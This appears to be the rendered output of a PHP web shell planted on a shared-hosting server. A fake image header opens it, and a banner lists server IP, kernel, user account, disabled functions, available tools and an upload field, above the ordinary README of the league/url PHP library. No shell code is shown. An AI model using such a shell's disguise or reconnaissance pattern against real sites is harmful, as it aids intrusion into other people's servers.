����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.139.86.227 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/app/libraries/vendor/league/url/ |
Upload File : |
# Url [](https://travis-ci.org/thephpleague/url) [](https://scrutinizer-ci.com/g/thephpleague/url/?branch=3.x) [](https://scrutinizer-ci.com/g/thephpleague/url/?branch=3.x) [](LICENSE.md) [](https://github.com/thephpleague/url/releases) [](https://packagist.org/packages/league/url) Url is a simple library to ease creating and managing Urls in PHP. This package is compliant with [PSR-2][], and [PSR-4][]. [PSR-4]: https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-4-autoloader.md [PSR-2]: https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-2-coding-style-guide.md Requirements ------- You need **PHP >= 5.3.0** and the `mbstring` extension to use the library, but the latest stable version of PHP is recommended. Install ------- Install `Url` using Composer. ``` composer require league/url:~3.0 ``` This will edit (or create) your `composer.json` file and automatically choose the most recent version in the 3.x serie. #### Going Solo You can also use `League\Url` without using Composer by [downloading the library](https://github.com/thephpleague/url/releases) and using a [PSR-4](http://www.php-fig.org/psr/psr-4/) compatible autoloader. Documentation ------- `League\Url` is [fully documented](http://url.thephpleague.com). Contribute to this documentation in the [gh-pages branch](https://github.com/thephpleague/url/tree/gh-pages). Testing ------- ``` bash $ phpunit ``` Contributing ------- Please see [CONTRIBUTING](CONTRIBUTING.md) for details. Credits ------- - [ignace nyamagana butera](https://github.com/nyamsprod) - [All Contributors](graphs/contributors) License ------- The MIT License (MIT). Please see [License File](LICENSE) for more information.